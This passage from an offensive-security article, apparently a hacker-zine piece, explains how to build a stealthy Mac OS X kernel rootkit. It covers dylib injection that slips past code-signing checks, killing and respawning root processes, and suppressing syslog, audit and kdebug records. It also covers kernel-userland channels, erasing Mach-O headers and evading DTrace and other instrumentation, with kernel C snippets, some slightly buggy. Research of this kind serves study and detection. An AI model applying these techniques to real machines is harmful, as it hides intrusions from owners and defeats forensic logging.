the header to find free space where we can add the new LC_LOAD_DYLIB
command. The necessary free space is common - most binaries have enough
slack space between the last command and first code/data.

The header can be retrieved from the user space with vm_map_read_user()
or copyin (because here we are executing in current proc context).
After we have found the free space and the full Mach-O header is in our
buffer, we just need to add a new LC_LOAD_DYLIB command.

The two below diagrams show what needs to be done at the Mach-O header:

.-------------------.
|       HEADER      |<- Fix this struct:
|-------------------| struct mach_header {
|   Load Commands   |   uint32_t        magic;
|  .-------------.  |   cpu_type_t      cputype;
|  |  Command 1  |  |   cpu_subtype_t   cpusubtype;
|  |-------------|  |   uint32_t        filetype;
|  |  Command 2  |  |   uint32_t        ncmds;      <- add +1
|  |-------------|  |   uint32_t        sizeofcmds; <- += size of new cmd
|  |     ...     |  |   uint32_t        flags;
|  |-------------|  |  };
|  |  Command n  |  |
|  |-------------|  |
|  | Command n+1 |  |<- add new command here:
|  `-------------  | struct dylib_command {
|-------------------|  uint32_t        cmd;
|        Data       |  uint32_t        cmdsize;
| .---------------. |  struct dylib    dylib;
| |   | Section 1 | | };
| | 1 |-----------| | struct dylib {
| |   | Section 2 | |  union lc_str  name;
| `--------------- |  uint32_t timestamp;
| .---------------. |  uint32_t current_version;
| |   | Section 1 | |  uint32_t compatibility_version;
| | 2 |-----------| | };
| |   | Section 2 | | union lc_str {
| `--------------- |  uint32_t        offset;
|       ...         | #ifndef __LP64__ // not used
|                   |  char            *ptr;
|                   | #endif
|                   | };
`-------------------

A diff between original and modified:

.-------------------.     .-------------------.
|       HEADER      |     |       HEADER      |<- Fix this struct
|-------------------|     |-------------------| struct mach_header {
|   Load Commands   |     |   Load Commands   |  ...
|  .-------------.  |     |  .-------------.  | uint32_t  ncmds;     <- fix
|  |  Command 1  |  |     |  |  Command 1  |  | uint32_t  sizeofcmds;<- fix
|  |-------------|  |     |  |-------------|  |  ...
|  |  Command 2  |  |     |  |  Command 2  |  |  };
|  |-------------|  |     |  |-------------|  |
|  |     ...     |  |     |  |     ...     |  |
|  |-------------|  |     |  |-------------|  |
|  |  Command n  |  |     |  |  Command n  |  |
|  `-------------  |     |  |-------------|  |
|                   |---->|  | Command n+1 |  |<- add new command here
|                   |---->|  `-------------  | struct dylib_command {
|-------------------|---->|-------------------|  uint32_t        cmd;
|        Data       |---->|        Data       |  uint32_t        cmdsize;
| .---------------. |---->| .---------------. |  struct dylib    dylib;
| |   | Section 1 | |---->| |   | Section 1 | | };
| | 1 |-----------| |     | | 1 |-----------| |
| |   | Section 2 | |     | |   | Section 2 | |
| `--------------- |     | `--------------- |
| .---------------. |     | .---------------. |
| |   | Section 1 | |     | |   | Section 1 | |
| | 2 |-----------| |     | | 2 |-----------| |
| |   | Section 2 | |     | |   | Section 2 | |
| `--------------- |     | `--------------- |
|       ...         |     |       ...         |
`-------------------     `-------------------

There are other methods to inject the library if there is not enough
space. One that requires only 24 bytes is described at [16].

This approach has one interesting advantage - it is not detectable by code
signing because the injection occurs after its checks and flags are set.
This is the code that sets the flags:

    /*
     * Set code-signing flags if this binary is signed, or if parent has
     * requested them on exec.
     */
    if (load_result.csflags & CS_VALID) {
        imgp->ip_csflags |= load_result.csflags &
            (CS_VALID|
             CS_HARD|CS_KILL|CS_EXEC_SET_HARD|CS_EXEC_SET_KILL);
    } else {
        imgp->ip_csflags &= ~CS_VALID;
    }

    if (p->p_csflags & CS_EXEC_SET_HARD)
        imgp->ip_csflags |= CS_HARD;
    if (p->p_csflags & CS_EXEC_SET_KILL)
        imgp->ip_csflags |= CS_KILL;

The code snippet is from exec_mach_imgact() and located well before our
two candidate functions described in section 4.3. Code signing does not
kill immediately the process. The flags are verified later and a kill
signal sent if code signing was configured to exit on failure (which we
can also modify here).

The only puzzle piece left is which process should we use and how to kill
it. There are many root processes controlled by launchd so it is just
a matter of selecting one with invisible and/or small impact. Spotlight
is for example a good candidate. A code snippet to do the killing:

proc_t victim = proc_find(TARGET_PID);
if (victim != PROC_NULL)
{
    // we need to release reference count from proc_find() before kill
    proc_rele(kill);
    // now we can kill the process or use SIGSEV coz' Spotlight crashes,
    // right? :-)
    psignal(kill, SIGKILL);
}

When launchd respawns the process, we can intercept it at
exec_mach_imgact() and do our magic. The rest is responsibility of the
dynamic library.


----[ 4.5 - The dynamic library

The dynamic library is very easy to create if you use the Xcode template
(oh the drama, hackers use Makefiles!) or just Google for a simple
Makefile.

To execute the library code you can add an entrypoint via a constructor:

extern void init(void) __attribute__ ((constructor));
void init(void)
{
    // do evil stuff here
}

init will be executed as soon as the library is loaded. Another way
could be by modifying the injected process symbol stub and redirect
to an entrypoint function inside the library. While the symbol stub
modification could be made from the kernel, we do not know yet where
library will be loaded so it is harder to execute this. For example, it
could be delayed by hijacking a syscall, wait for its execution and then
modify a symbol. The downside is more time for detection as explained
in next section. Honestly I have not thought much about this case.

To execute commands from the library it is just a matter of fork'ing
and exec'ing whatever command we need. We can also create a new thread
(or multiple) to leave a resident backdoor and so on. Or just execute
the command we need and clean up ourselves to leave no traces.

It is up to you and your particular requirements and imagination :-).


----[ 4.6 - Hiding our tracks

By principle, a rootkit should be as stealth as possible - we need to
cover our tracks to the maximum possible extent. Let me discuss a few
problems and potential solutions with the previously described approaches.

The first one is that we need to restart a target process. This will
leave an immediate clue on a (potentially very) higher PID, depending
when the method is used (near startup it is ok).

Another clue is that we are sending a signal to the target process
and syslogd will capture it. Instead of a kill we could send a SIGSEGV
(Apple's software has bugs, right?), or just temporarily memory patch
syslogd daemon to avoid logging our little trick. Different possibilities
to solve this problem!

The SIGSEGV is particularly interesting since the resulting crash dump
has no useful information and it only leaves this log trail:

12/21/12 3:27:13.093 AM com.apple.launchd[1]: (com.apple.metadata.mds[277])
Job appears to have crashed: Segmentation fault: 11

Patching (temporarily or not) syslogd is rather easy to accomplish. Looking
at Apple's syslogd source we can find the following function in
syslogd/daemon.c:

void process_message(aslmsg msg, uint32_t source)

Near the end it has this code:

/* send message to output modules */
asl_out_message(msg);
if (global.bsd_out_enabled) bsd_out_message(msg);

The asl_out_message() appears to be the interesting place to patch. To
quickly test this theory we can attach gdb to syslogd (warning, ASLR
enabled), and patch that function. We need to search the function address
because there are no debug symbols available.

Let's look at its implementation:

void asl_out_message(aslmsg msg)
{
    dispatch_flush_continuation_cache();
    asl_msg_retain((asl_msg_t *)msg);
    dispatch_async(asl_action_queue, ^{
        _asl_action_message(msg);
        asl_msg_release((asl_msg_t *)msg);
    });
}

There are two external symbols, dispatch_flush_continuation_cache()
and asl_msg_retain(). The former has only a reference and the latter
two. To find the location of asl_out_message() we just need to find out
the proc_t for syslogd process, read and process its symbol table (we
can read from memory or filesystem), correct for ASLR slide, and find
the address of the stub. Since this is not IDA we can't easily find the
cross-references (oh, IDA spoils us).

What we can do is search in the binary the calls to the symbol stub
(it is a relative offset call). Even easier (and probably faster)
is to disassemble and match the address of the call with the stub -
the disassembler will output the final address.

After we have the address where dispatch_flush_continuation_cache() is
called from we just need to find the function prologue and patch it with
a ret (function return is void so no need for xor eax,rax). We can then
restore the original byte after we execute our command. Another function,
bsd_out_message() might need to be patched, but I leave that task to you,
the reader.

Another alternative is to try to recycle the PID that was killed. The
forkproc() function is the one that allocates the new PID for the
child. Might be interesting to research and explore this alternative. You
also might want to reorder the proc list and move the new element to the
original location instead of being in newer location. Many possibilities
to hide and try to detect the rootkit actions. That is why it is fun!

The next issue is that process memory will have our injected library so
we want to remove it as soon as possible. I did some interesting work
in this area but NDA oblige and can't disclose it. It can be done and
you should think about it, or just use a brute approach and kill the
process again and this time do not inject anything. Whatever works :-)

There is no need to have a resident library somewhere at the filesystem
ready to be discovered. We can read and write from and to anywhere the
filesystem so we can store the library code encrypted inside the kernel
module or store it somewhere else, for example in a sqlite3 database
(there are so many spread all over OS X). Before the injection we can
unpack it somewhere, execute it, and then remove when not needed anymore.

One thing I had no time to verify if the impact from Spotlight if we
use the unpacking to filesystem approach. It might be able to detect
the new file and store in its database, so we must be careful over here.


--[ 5 - Revisiting userland<->kernel communication

Fortunately there are many options to establish communication between
kernel and userland applications in OS X. The sysctl interface previously
presented [1] is easy to implement but it is too cumbersome to transfer
large amounts of data. Let me present you additional options.


----[ 5.1 - Character devices and ioctl

The easiest way to have userland<->kernel communication is to create
a character device and use the ioctl interface to control it. We just
need to create and register the new device and add the necessary entry
point functions.

It all starts with the structure cdevsw:
/*
 * Character device switch table
 */
struct cdevsw {
    open_close_fcn_t    *d_open;
    open_close_fcn_t    *d_close;
    read_write_fcn_t    *d_read;
    read_write_fcn_t    *d_write;
    ioctl_fcn_t         *d_ioctl;
    stop_fcn_t          *d_stop;
    reset_fcn_t         *d_reset;
    struct tty          **d_ttys;
    select_fcn_t        *d_select;
    mmap_fcn_t          *d_mmap;
    strategy_fcn_t      *d_strategy;
    void                *d_reserved_1;
    void                *d_reserved_2;
    int                 d_type;
};

The most interesting entrypoints for our purposes are open, close,
ioctl. If you are interested in using this communication channel, you
probably should think about encrypting it or some kind of authentication
method. OS.X/Crisis has no authentication whatsoever so anyone can send
commands to the kernel rootkit after (easily) finding all the possible
ioctl commands.

The code is very simple so there is no point in discussing it here. The
provided source code implements this and kernel control so you can browse
it and verify how it is done.

Besides the problems with encryption, authentication and ioctl commands
reversing, this solution creates a new character device that needs
to be hidden or else it will be too easy to detect. And then we have
additional traces inside the kernel structures that need to be hidden,
creating a vicious circle (rootkits are a vicious circle of hide &
seek and that is why they can be so fun to write about).


----[ 5.2 - Kernel Control KPI

The kernel control KPI is interesting because it allows bidirectional
communication with userland and transfer of large amounts of data. Its
implementation is rather simple via a regular socket (PF_SYSTEM). Apple's
reference documentation can be found at [17] and sample code at [18].

A kernel extension is responsible for creating the socket and the userland
part will read and send data to that same socket (socket access can be
restricted to privileged users or everyone).

The kernel implementation is done by registering a control structure
kern_ctl_reg defined at bsd/sys/kern_control.h. From Apple's example:

// the reverse dns name to be used between kernel and userland
#define BUNDLE_ID   "put.as.hydra"

static struct kern_ctl_reg g_ctl_reg = {
 BUNDLE_ID,      /* use a reverse dns name */
 0,              /* set to 0 for dynamically assigned control ID */
 0,              /* ctl_unit - ignored when CTL_FLAG_REG_ID_UNIT not set */
 /* privileged access required to access this filter */
 CTL_FLAG_PRIVILEGED,
 0,               /* use default send size buffer */
 0,               /* Override receive buffer size */
 ctl_connect,     /* Called when a connection request is accepted */
 ctl_disconnect,  /* called when a connection becomes disconnected */
 NULL,         /* handles data sent from the client to kernel control */
 ctl_set,      /* called when the user process makes the setsockopt call */
 ctl_get       /* called when the user process makes the getsockopt call */
};

The connect and disconnect functions handle userland connections. When a
new connection is established we need to retain the unit id and control
reference - they are required for sending data and removing the kernel
control.

The ctl_get function handles the communication from kernel to userland -
sends data to the socket when client requests it, and ctl_set handles
data from userland to kernel. The kernel data to be sent to userland
should be enqueued using ctl_enqueuedata() (this is where we need the
unit id and control reference).

A quick example of a function to enqueue the PID of a process:

static u_int32_t gClientUnit = 0;
static kern_ctl_ref gClientCtlRef = NULL;
/*
 * get data ready for userland to grab
 * send PID of the suspended process and let the userland daemon do the
 * rest
 */
kern_return_t
queue_userland_data(pid_t pid)
{
    errno_t error = 0;
    if (gClientCtlRef == NULL) return KERN_FAILURE;

    error = ctl_enqueuedata(gClientCtlRef, gClientUnit, &pid,
    sizeof(pid_t), 0);

    if (error) printf("[ERROR] ctl_enqueuedata failed with error: %d\n",
    error);
    return error;
}

Another important detail is about the control ID. Since the recommended
way is to use a dynamically assigned control ID, the userland client
needs somehow to retrieve it. This can be done using a ioctl request
(the reverse dns name must be shared between the kernel and userland).

int gSocket = -1;
struct ctl_info ctl_info;
struct sockaddr_ctl sc;
gSocket = socket(PF_SYSTEM, SOCK_DGRAM, SYSPROTO_CONTROL);
// the control ID is dynamically generated so we must obtain sc_id using
// ioctl
memset(&ctl_info, 0, sizeof(ctl_info));
strncpy(ctl_info.ctl_name, "put.as.hydra", MAX_KCTL_NAME);
ctl_info.ctl_name[MAX_KCTL_NAME-1] = '\0';
if (ioctl(gSocket, CTLIOCGINFO, &ctl_info) == -1)
{
    perror("ioctl CTLIOCGINFO");
    exit(1);
}
else
    printf("ctl_id: 0x%x for ctl_name: %s\n", ctl_info.ctl_id,
ctl_info.ctl_name);
// build the sockaddr control structure and finally connect to the socket
bzero(&sc, sizeof(struct sockaddr_ctl));
sc.sc_len = sizeof(struct sockaddr_ctl);
sc.sc_family = AF_SYSTEM;
sc.ss_sysaddr = AF_SYS_CONTROL;
sc.sc_id = ctl_info.ctl_id;
sc.sc_unit = 0;
ret = connect(gSocket, (struct sockaddr*)&sc, sizeof(sc));

After connection to the socket is established, the userland client can
send data using setsockopt() and receive with recv(). The remaining
implementation details are easy to understand by reading Apple's
referenced sample code.

This communication channel might not be that interesting for rootkit'ing
purposes because it requires additional effort to hide, in particular
the socket information that can be explored by memory forensic tools. If
commercial spyware is using character devices for communication then we
can't forget this possibility when analysing a potentially compromised
machine.

Nevertheless it can be interesting for other purposes. As an example,
I created a PoC (to be released later) to stop certain processes when
they are created ( p->p_stat = SSTOP) and communicate their PID to a
userland daemon. The userland daemon attaches to the process and modifies
whatever it needs. In this particular case it is used to patch code
signed applications without needing to resign and patch any checksum
checks. We already saw that OS X code-signining verifications are done
before the process is stopped and do not detect these modifications
(application own run-time code checksum checks are another story!). It
is not the best solution but just a nice set of tricks and demo usage
of this communication channel.


----[ 5.3 - Alternative channels

The two presented solutions are easy to setup and use but also easy
to detect. Their main problem is that they leave "permanent" traces
that need to be hidden (kernel structures for example). This increases
rootkit's complexity and chances of being detected.

Covert channels are a lot more appropriate and a lot has been written
about them. Since it is so easy to use almost any kernel function, the
possibilities to be creative in this department are much higher. Data can
be stealthy read and written anywhere in the filesystem, bypassing many
detection and instrumentation mechanisms as it will be shown next. At
the limit there is no real need for a direct communication channel! For
example, data can be encoded in a binary and intercepted when it is
executed. The possibilities are really endless. This very short section
is just a reminder that rootkit design can be different from what is
usually done and that you should think about it, whether you belong to
the offensive or defensive side.


--[ 6 - Anti-forensics

Mac OS X kernel is instrumentation rich, featuring DTrace and
others. These can assist in rootkit uncloaking. Memory forensics is
also playing an important role these days in malware detection and
analysis. This section goal is to present some ideas on how to attack or
hide from these technologies. It is not an exhaustive list but it tries
to cover the main ones. OS X kernel is still big and full of interesting
places to be explored. Keep that in mind! Due to time constraints it is
not possible to write about fooling/defeating the memory forensics tools
as I initially planned. It was somewhat similar to what was presented at
29C3 in Defeating Windows memory forensics presentation [33] and other
similar work presented in the past.


----[ 6.1 - Cheap tricks to reduce our footprint

An extremely easy trick to pull without any side consequences for us
is to remove the Mach-O header from process's memory. A memory dump
will require additional effort to find and rebuild the original binary
(harder in userland binaries, simpler in kernel extensions). Do not
forget that Mach-O header permissions are R-X so make it writable first.

Kernel extensions must have a start and stop function. Their prototype
specifies a kmod_info_t structure as first parameter. It is part of a
linked list of all loaded kernel extensions (used to hide the rootkit
from kextstat but now marked deprecated) and contains a very useful
field to apply this cheap trick.

typedef struct kmod_info {
    struct kmod_info  * next;
    int32_t             info_version;          // version of this structure
    uint32_t            id;
    char                name[KMOD_MAX_NAME];
    char                version[KMOD_MAX_NAME];
    int32_t             reference_count;       // # linkage refs to this
    kmod_reference_t  * reference_list;        // who this refs (links on)
    vm_address_t        address;               // starting address
    vm_size_t           size;                  // total size
    vm_size_t           hdr_size;              // unwired hdr size
    kmod_start_func_t * start;
    kmod_stop_func_t  * stop;
} kmod_info_t;

The "address" field contains the starting address of the currently loaded
kext, including the ASLR slide (kernel and kernel extensions Mach-O header
values include the current kernel ASLR slide). With this information we
just need to find out the total size of the header and nuke it:

int nuke_mach_header(mach_vm_address_t address)
{
    struct mach_header *mh = (struct mach_header_64*)address;
    uint32_t header_size = 0;
    if (mh->magic == MH_MAGIC_64)
    {
        header_size = mh->sizeofcmds + sizeof(struct mach_header_64);
    }
    else return 1;
    // we have total header size and startup address
    // disable CR0 write protection
    disable_wp();
    memset((void*)my_address, 0, header_size);
    enable_wp();
    return 0;
}

Instead of just zero'ing the header you could fill it with random junk
data for fun. You can even mangle data from the other commands (LINKEDIT,
LC_SYMTAB, LC_DYSYMTAB, LC_UUID). For example, there are no symbol stubs
in kernel - symbols are solved when kernel extension is loaded and calls
are made directly to the referenced symbol. This is a problem because
it can be used to detect valid code and get hints on what it is trying
to do. One can generate a table of all kernel symbols and use it to find
cross references in kernel memory and dump that code.

Function pointers can help to hide our code - the question is how easy or
not it is to bootstrap the rootkit to search the required symbols. One
solution can be to use the techniques described before to find the
symbols and then mangle the bootstrap code - only leave in memory code
using function pointers. Be creative, try to reduce your footprint to
the maximum :-).


----[ 6.2 - Attacking DTrace and other instrumentation features

Mac OS X has many instrumentation features available. There are at
least DTrace, FSEvents, Kauth, kdebug, and TrustedBSD. TrustedBSD's
original goal is not instrumentation related but can be used (or abused)
for this purpose. Kauth is explored in Section 6.3 with AV-Monster II,
while all the others in the next subsections.


------[ 6.2.1 - FSEvents

FSEvents is an API for file system notification. Applications register
for events that are interested in and receive them via /dev/fsevents. A
file system monitor can be built on top of this - the usual suspects
[13] and [14] offer a good explanation about its internals and code
samples. Jonathan Levin has a "filemon" tool available at his book
companion web site.

The responsibility to add the events belongs to the function add_fsevent()
[bsd/vfs/vfs_fsevents.c]. It is a bit long vararg function and I do
not want to spend space and time analysing it. Amit Singh has a nice
figure on page 1421 of [14] with functions that add events. For example,
the open syscall can generate a file create event (FSE_CREATE_FILE).

The next diagram shows the how the event is added:

open() -> open_nocancel() -> open1()    [bsd/vfs/vfs_syscalls.c]
                               |
                               v
[bsd/vfs/vfs_vnops.c]    vn_open_auth() -> vn_open_auth_do_create()
                                                    |
                                                    v
[bsd/vfs/vfs_fsevents.c]       add_fsevent() <- need_fsevent()

In this particular case we could hijack need_fsevent(), match the file we
want to hide and return 0 to avoid event generation. In many cases there
is a direct call to add_fsevent() so we also need to hijack it. Inside our
new function we need to retrieve the necessary information to match the
event we want to hide and return EINVAL or 0 in those cases. You should
study the add_fsevent() function to understand how to implement this. I
do not think there is much value in describing it here - there are more
(interesting) topics to cover.


------[ 6.2.2 - kdebug

kdebug is another (rather obscure) kernel trace facility used only by
Apple utils such as fs_usage and sc_usage. Documentation is poor and the
best references are those utils source code and a few pages by Levin [13].
The relevant include file is bsd/sys/kdebug.h. kdebug is implemented in
kernel functions that might produce relevant events using KERNEL_DEBUG()
macro. The kernel functions involved (in that macro) are kernel_debug()
and kernel_debug_internal() (with always inline attribute).

A 32 bits integer is used for the debug messages, with the following
format:

 ----------------------------------------------------------------------
|              |               |                               |Func   |
| Class (8)    | SubClass (8)  |          Code (14)            |Qual(2)|
 ----------------------------------------------------------------------

For example, filesystem operations use class DBG_FSYSTEM (3) and
different subclasses to filter between different operations such as read
and writes to filesystem, vnode operations, HFS events, etc (consult
kdebug.h include).

Macros exist to encode the integer for each available class. Using BSD
class as an example:

#define KDBG_CODE(Class, SubClass, code) (((Class & 0xff) << 24) |
((SubClass & 0xff) << 16) | ((code & 0x3fff)  << 2))
#define BSDDBG_CODE(SubClass, code) KDBG_CODE(DBG_BSD, SubClass, code)

Grep'ing XNU source code for BSDDBG_CODE will show where kdebug is
implemented in all BSD related functions. The fs_usage util traces
the file system related system calls (its source is located in
system_cmds-550.10 package). For example, it contains the following
code for open() syscall:

#define BSC_open                0x040C0014

If we look at kdebug's include we have the following Class and SubClass
codes:

#define DBG_BSD                 4
#define DBG_BSD_EXCP_SC         0x0C    /* System Calls */

Open is syscall #5 and it matches the code: (0x040C0014 & 0x3FFF) >>
2 = 0x5

Grep'ing for the DBG_BSD_EXCP_SC SubClass will land us into
bsd/dev/i386/systemcalls.c - the file that implements the C portion of
syscalls code. kdebug's tracing of syscalls entry and exit can be found
at unix_syscall64 using two macros that call kernel_debug():

(...)
KERNEL_DEBUG_CONSTANT_IST(KDEBUG_TRACE,
                BSDDBG_CODE(DBG_BSD_EXCP_SC, code) | DBG_FUNC_START,
                (int)(*ip), (int)(*(ip+1)), (int)(*(ip+2)),
                (int)(*(ip+3)), 0);
(...)
error = (*(callp->sy_call))((void *) p, uargp, &(uthread->uu_rval[0]));
(...)
KERNEL_DEBUG_CONSTANT_IST(KDEBUG_TRACE,
            BSDDBG_CODE(DBG_BSD_EXCP_SC, code) | DBG_FUNC_END,
            error, uthread->uu_rval[0], uthread->uu_rval[1], p->p_pid, 0);
(...)

The easiest way to disable tracing of BSD related functions (besides
patching kernel_debug to just return) is to modify the calls to
kernel_debug() and reroute them to our own function. The disassembler
makes this extremely easy, so much that I implemented code for each call
to kernel_debug() to have its own trampoline (there is really no need
for such thing!). Sample function to disable all BSD syscall traces:

void
tfc_kernel_debug(uint32_t debugid, uintptr_t arg1, uintptr_t arg2,
uintptr_t arg3, uintptr_t arg4, __unused uintptr_t arg5)
{
 // solve the symbol of the original function
 static void (*_kernel_debug)(uint32_t debugid, uintptr_t arg1,
 uintptr_t arg2, uintptr_t arg3, uintptr_t arg4,
 __unused uintptr_t arg5) = NULL;
 if (_kernel_debug == NULL)
  _kernel_debug = (void*)solve_kernel_symbol(&g_kernel_info,
  "_kernel_debug");

 // do not let fs_usage/sc_usage trace any BSD* system calls
 if ( (debugid >> 24) == DBG_BSD) return;
 else _kernel_debug(debugid, arg1, arg2, arg3, arg4, 0);
}

This patch will be suspicious when fs_usage and/or sc_usage are used
because no BSD system calls will be traced and screen output will be very
low. kdebug's implementation poses some problems to distinguish between
cases to hide or not. Its buffers are very small and this is easily
noticed if you peak at fs_usage or sc_usage code (verify the lookup()
[bsd/vfs/vfs_lookup.c] kernel function to see how fs_usage gets the path
name for syscalls such as open()).

Fortunately for us there is a easy way to accomplish this using
current_proc() - it returns a proc structure for the currently executing
process. With this information we can retrieve the process name from
the proc structure (p_comm field, max size 16) and match against the
processes we do not want traced. A code snippet for a simple check to
hide vmware-tools-daemon:

struct proc *p = current_proc();
// MAXCOMLEN == 16, we could hash always to MAXCOMLEN to avoid strlen call
uint32_t hash = hash_name(&p->p_comm[0], strlen(&p->p_comm[0]));
static uint32_t hidehash = 0;
if (hidehash == 0) hidehash = hash_name("vmware-tools-daemon", MAXCOMLEN);
if (hash == hidehash ) return;
else _kernel_debug(debugid, arg1, arg2, arg3, arg4, 0);

The basic blocks to override kdebug are presented, implementation details
are left to the attached sample code and to you.

One final word of caution. The interception of Mach syscalls at kdebug
gives some problems and the hooking is very unstable (read kernel
panics). This is particularly exacerbated with the zombies rootkit
feature later described. The attached code has been written to support
that feature but at time of writing I still had no time to research the
Mach problem - the code just ignores that class.


------[ 6.2.3 - TrustedBSD

TrustedBSD is a project that started in FreeBSD and was ported to OS
X in Leopard. It enables a series of (interesting) security features,
the most famous one being the OS X/iOS sandbox. Its implementation is
done by adding "hooks" in critical kernel functions. Policy modules
can be written to receive events from these "hooks" and act on them
if necessary/desirable.

One easy application is to create a runtime file system checker for
critical folders. The app monitors LaunchDaemons and notify the user if
a new file was added in there, which is a not so frequent operation and
a favourite spot for malware to make itself persistent (oh, this was a
good opportunity to use APT buzzword!). It can be used for evil purposes -
the same "hooks" can increase privileges or hide files [25].

Using an example with the open syscall (to be used later with in Kauth
section):

open() -> open_nocancel() -> open1()
                               |
                               v
                         vn_open_auth() -> vn_authorize_open_existing()
                                                    |
                                                    v
                                           mac_vnode_check_open()
                                                    |
                                                    v
                                                MAC_CHECK()
                                                    |
                                                    v
                                           call policy, if registered

The vnode check handler that we can install has the following prototype:

typedef int mpo_vnode_check_open_t(
        kauth_cred_t cred,
        struct vnode *vp,
        struct label *label,
        int acc_mode);

Our handler will receive a pointer to the vnode structure and make
it possible to dump the filename and even transverse the full path
(remember that vnodes exist in a linked list).

MAC_CHECK() is a macro that will route the request to the policy
modules. It is a bit like sysent table where there is a list called
mac_policy_list that holds function pointers. A presentation by Andrew
Case on Mac memory forensics [26] analyses how to find malicious
TrustedBSD modules using this list against a sample I created (rex
the wonder dog). It is worth to check his slides for other Mac memory
forensics tips.

The available policy checks can be found at bsd/security/mac_framework.h,
and their implementation is in the different source files in the same
folder. What interests us is that mac_* functions are always called so
there is a point of entry that can be used. The mac_* functions contain
all the necessary/available information since they are the ones always
calling and passing the parameters to the policy modules via MAC_CHECK()
macro.

To attack this we can use the same old story: hook those functions,
or attack the mac_policy_list using the syscall handler concept, or
something else. When loading the rootkit it might also be useful to
lookup the policy list to verify if there is anything else installed
other than default modules. The system owner might be a bit smarter than
the vast majority ;-).


------[ 6.2.4 - Auditing - Basic Security Module

The auditing features available from the Basic Security Module
Implementation are not really instrumentation but since their purpose is
to track user and process actions we should be interested in understanding
and tweak them to our evil purposes.

Auditing is not fully enabled by default due to its (potentially)
considerable performance hit and disk space usage (oh, I miss those
PCI-DSS meetings). To modify its configuration you need to edit
/etc/security/audit_control. The two interesting fields are flags and
naflags (flags for events that can be matched to a user, naflags for
those who can't). Event classes are defined in /etc/security/audit_class
(description can be found at [27] and [28]). For example, if "pc" class
is configured audit will log exec() and its arguments.

Let's move to what really matters for us, evil stuff! Auditing is
implemented with macros [bsd/security/audit/audit.h] inside BSD and
Mach system calls (and some other places). The following code snippet
is from unix_syscall64 implementation, where entry and exit macros are
placed before the syscall function to be executed is called:

AUDIT_SYSCALL_ENTER(code, p, uthread);
error = (*(callp->sy_call))((void *) p, uargp, &(uthread->uu_rval[0]));
AUDIT_SYSCALL_EXIT(code, p, uthread, error);

About the contents of entry macro:

/*
 * audit_syscall_enter() is called on entry to each system call. It is
 * responsible for deciding whether or not to audit the call
 * (preselection), and if so, allocating a per-thread audit record.
 * audit_new() will fill in basic thread/credential properties.
 */

The exit macro is the interesting one because it calls
audit_syscall_exit():

/*
 * audit_syscall_exit() is called from the return of every system call, or
 * in the event of exit1(), during the execution of exit1(). It is
 * responsible for committing the audit record, if any, along with return
 * condition.
 */

When committed, the audit record will be added to an audit queue and
removed from the user thread structure (struct uthread, field uu_ar
[bsd/sys/user.h]).

void
audit_syscall_exit(unsigned int code, int error, __unused proc_t proc,
    struct uthread *uthread) {
(...)
        audit_commit(uthread->uu_ar, error, retval);
out:
        uthread->uu_ar = NULL;
}

The commit function:

void audit_commit(struct kaudit_record *ar, int error, int retval) {
(..)
        TAILQ_INSERT_TAIL(&audit_q, ar, k_q); // add to queue
        audit_q_len++;
        audit_pre_q_len--;
        cv_signal(&audit_worker_cv); // signal worker who commits to disk
        mtx_unlock(&audit_mtx);
}

By default in OS X, almost everything is disabled excepting logging
and authentication to obtain higher privileges. The command "praudit
/dev/auditpipe" (as root, of course) can be used to live audit events. Run
the command and login via ssh, or lock and unlock the console to see
these events.

Syscall exit or audit commit functions can be temporarily patched to
test if they are the right places, and yes they are. Removing the call
to audit_commit() or patching it with a ret removes any trace of audit
events in logs. There are four references to commit in OS X 10.8.2
(3 calls, 1 jump):

- audit_syscall_exit
- audit_mach_syscall_exit
- audit_proc_coredump
- audit_session_event

To have granular control over the auditing process is a bit more
complicated. There is not always enough information available to
distinguish between the cases we want to hide at audit_commit(). For
example, if process auditing is enabled, the fork1() function calls
audit like this: AUDIT_ARG(pid, child_proc->p_pid);

This will call the function responsible to set the audit record field:

void audit_arg_pid(struct kaudit_record *ar, pid_t pid)
{
    ar->k_ar.ar_arg_pid = pid;
    ARG_SET_VALID(ar, ARG_PID);
}

The problem here is that we do not have (yet) enough information about
this fork; we are not sure (yet) if it is the process we want to hide or
some other process. A different tactic must be used! Because there is
an events queue we can hijack the worker responsible for those commits
to disk, audit_worker() [bsd/security/audit/audit_worker.c].

The missing piece is how to correlate all events we are interested
in. Luckily for us (and the auditor in particular) there is a session
id in audit record structure [bsd/security/audit/audit_private.h]:

pid_t  ar_subj_asid; /* Audit session ID */

With this information we just need to hold the queue commit to disk until
enough information to find the correct session ID is available. When we
have it we can edit the queue and remove all the entries that match that
session ID.

Last but not least, there is a critical task left! Auditing logs must be
cleaned in case auditing was already properly configured. The bad news
is that you will have to do this dirty work yourself. Do not forget that
the logs are in binary format and OpenBSM's source at [29] can be helpful
(praudit outputs XML format so it might be a good starting point).


------[ 6.2.5 - DTrace

DTrace is a fantastic dynamic tracing framework introduced by Sun in
Solaris and available in Mac OS X since Leopard. It can be used to trace
in real-time almost every corner of kernel and user processes with minimum
performance impact. An experienced system administrator can use its
power to assist in discovering strange (aka malicious) behaviour. There
are different providers that can trace almost every function entry and
exit, BSD syscalls and Mach traps, specific process, virtual memory, and
so on. The two most powerful providers against rootkits are syscall and
fbt (function boundary). We will see how they are implemented and how to
modify them to hide rootkit activity. A good design and implementation
overview is provided by [23] (Google is your friend) and usage guide at
[24].


------[ 6.2.5.1 - syscall provider

This provider allows to trace every BSD system call entry and return (the
provider for Mach traps is mach_trap). A quick example that prints the path
argument being passed to the open() syscall:
# dtrace -n 'syscall::open:entry
{
    printf("opening %s", copyinstr(arg0));
}'
dtrace: description 'syscall::open:entry' matched 1 probe
CPU     ID                    FUNCTION:NAME
  0    119                       open:entry opening /dev/dtracehelper
  0    119                       open:entry opening
/usr/share/terminfo/78/xterm-256color
  0    119                       open:entry opening /dev/tty
  0    119                       open:entry opening /etc/pf.conf

The syscall provider is useful to detect syscall handler manipulation
but not the function pointers modification at sysent table. To understand
why let's delve into its implementation.

This provider is implemented by rewriting the system call table when
a probe is enabled, which in practice is the same operation as sysent
hooking. The interesting source file is bsd/dev/dtrace/systrace.c. It
contains a global pointer called systrace_sysent - a DTrace related
structure that will hold the original system call pointer and some
other info.

Things start happening at systrace_provide(). Here systrace_sysent is
allocated and all necessary information copied from the original sysent
table (systrace_init). Then internal DTrace probe information is added.

DTrace's philosophy is of zero probe effect when disabled so there are
functions that replace and restore the sysent table entries. There is a
struct called dtrace_pops_t which contains provider's operations. Syscall
provider has the following:

static dtrace_pops_t systrace_pops = {
        systrace_provide,
        NULL,
        systrace_enable,
        systrace_disable,
        NULL,
        NULL,
        NULL,
